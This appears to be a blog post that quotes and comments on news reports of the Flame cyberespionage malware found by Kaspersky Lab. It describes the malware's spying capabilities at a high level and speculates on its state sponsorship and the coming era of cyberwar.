Stuxnet On Steroids
Meet Flame. A cyber threat that makes Stuxnet seem like child's play.
It appears that there’s another cyberattack being directed at Iran:
A massive, highly sophisticated piece of malware has been newly found infecting systems in Iran and elsewhere and is believed to be part of a well-coordinated, ongoing, state-run cyberespionage operation.
The malware, discovered by Russia-based anti-virus firm Kaspersky Lab, is an espionage toolkit that has been infecting targeted systems in Iran, Lebanon, Syria, Sudan, the Israeli Occupied Territories and other countries in the Middle East and North Africa for at least two years.
Dubbed “Flame” by Kaspersky, the malicious code dwarfs Stuxnet in size – the groundbreaking infrastructure-sabotaging malware that is believed to have wreaked havoc on Iran’s nuclear program in 2009 and 2010. Although Flame has both a different purpose and composition than Stuxnet, and appears to have been written by different programmers, its complexity, the geographic scope of its infections and its behavior indicate strongly that a nation-state is behind Flame, rather than common cyber-criminals — marking it as yet another tool in the growing arsenal of cyberweaponry.
The researchers say that Flame may be part of a parallel project created by contractors who were hired by the same nation-state team that was behind Stuxnet and its sister malware, DuQu.
“Stuxnet and Duqu belonged to a single chain of attacks, which raised cyberwar-related concerns worldwide,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab, in a statement. “The Flame malware looks to be another phase in this war, and it’s important to understand that such cyber weapons can easily be used against any country.”
Early analysis of Flame by the Lab indicates that it’s designed primarily to spy on the users of infected computers and steal data from them, including documents, recorded conversations and keystrokes. It also opens a backdoor to infected systems to allow the attackers to tweak the toolkit and add new functionality.
The malware, which is 20 megabytes when all of its modules are installed, contains multiple libraries,SQLite3 databases, various levels of encryption — some strong, some weak — and 20 plug-ins that can be swapped in and out to provide various functionality for the attackers. It even contains some code that is written in the LUA programming language — an uncommon choice for malware.
Kaspersky Lab is calling it “one of the most complex threats ever discovered.”
Flame has apparently been in the wild since at least 2010, which means that its creation may predate Stuxnet and its related viruses. The fact that it went nearly two years without being detected is of no small concern and an indication of just how sophisticated the program apparently is. Of course, given some of the things that Flame can apparently do, its sophistication is rather obvious:
Among Flame’s many modules is one that turns on the internal microphone of an infected machine to secretly record conversations that occur either over Skype or in the computer’s near vicinity; a module that turns Bluetooth-enabled computers into a Bluetooth beacon, which scans for other Bluetooth-enabled devices in the vicinity to siphon names and phone numbers from their contacts folder; and a module that grabs and stores frequent screenshots of activity on the machine, such as instant-messaging and email communications, and sends them via a covert SSL channel to the attackers’ command-and-control servers.
The malware also has a sniffer component that can scan all of the traffic on an infected machine’s local network and collect usernames and password hashes that are transmitted across the network. The attackers appear to use this component to hijack administrative accounts and gain high-level privileges to other machines and parts of the network.
There’s no indication where Flame may have come from, though it does have similarities to Stuxnet in terms of some of the exploits that it takes advantage of in order to gain access to a system and transmit information. Stuxnet, of course, is widely believed to have been a joint U.S.-Israeli project designed primarily to disable as many Iranian nuclear centrifuges as possible. Flame, on the other hand, appears to be primarily designed to surreptisiously conduct espionage. The program even contains a “kill switch” that, once activated remotely removes all evidence of the program and the work that it has done from a system. Clearly not the work of amateurs.
Given where the program has ended up, it’s not illogical to assume that Flame may have had an origin similar to that of Stuxnet. However, it’s also a reminder that we’re entering a new era of cyber-war and that it’s only a matter of time before something is targeted at us.